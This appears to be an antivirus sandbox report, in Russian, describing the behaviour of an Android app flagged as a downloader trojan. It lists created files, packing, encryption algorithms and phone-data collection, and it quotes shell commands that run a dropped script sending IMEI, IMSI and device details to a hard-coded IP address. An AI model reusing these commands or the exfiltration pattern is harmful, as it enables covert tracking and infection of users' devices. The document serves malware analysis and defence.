Техническая информация
Вредоносные функции:
Выполняет код следующих детектируемых угроз:
- Android.DownLoader.3394
Изменения в файловой системе:
Создает следующие файлы:
- /data/data/####/.jg.ic
- /data/data/####/.log.lock
- /data/data/####/.log.ls
- /data/data/####/SlideShow_Data.xml
- /data/data/####/com.xyang.liu.beauty.apk
- /data/data/####/com.xyang.liu.beauty.xml
- /data/data/####/libjiagu.so
- /data/data/####/mobclick_agent_cached_com.xyang.liu.beauty
- /data/data/####/mobclick_agent_header_com.xyang.liu.beauty.xml
- /data/data/####/mobclick_agent_state_com.xyang.liu.beauty.xml
- /data/data/####/plugin-deploy.jar
- /data/data/####/plugin-deploy.key
- /data/data/####/share_sdk_0.xml
- /data/data/####/sharesdk.db-journal
- /data/data/####/small.ogg
- /data/data/####/unobs
Другие:
Запускает следующие shell-скрипты:
- <Package Folder>/app_lib/unobs <Package> http://112.124.45.224/uninstall/?site=malbum&device_id=<IMEI>d3733dc03212kkapp&version=3.7&imsi=<IMSI>&channel=wangdoujia&model=<System Property>&free_mem=794464256&total_mem=1055907840&language=en_US 0
- chmod 755 <Package Folder>/.jiagu/libjiagu.so
- chmod 775 <Package Folder>/app_lib/unobs
- sh <Package Folder>/app_lib/unobs <Package> http://112.124.45.224/uninstall/?site=malbum&device_id=<IMEI>d3733dc03212kkapp&version=3.7&imsi=<IMSI>&channel=wangdoujia&model=<System Property>&free_mem=794464256&total_mem=1055907840&language=en_US 0
Загружает динамические библиотеки:
- libjiagu
Использует следующие алгоритмы для шифрования данных:
- AES-ECB-PKCS7Padding
Использует следующие алгоритмы для расшифровки данных:
- AES-ECB-PKCS5Padding
- DES
- RSA-ECB-PKCS1Padding
Использует специальную библиотеку для скрытия исполняемого байт-кода.
Получает информацию о сети.
Получает информацию о телефоне (номер, IMEI и т. д.).
Получает информацию о запущенных приложениях.
Отрисовывает собственные окна поверх других приложений.
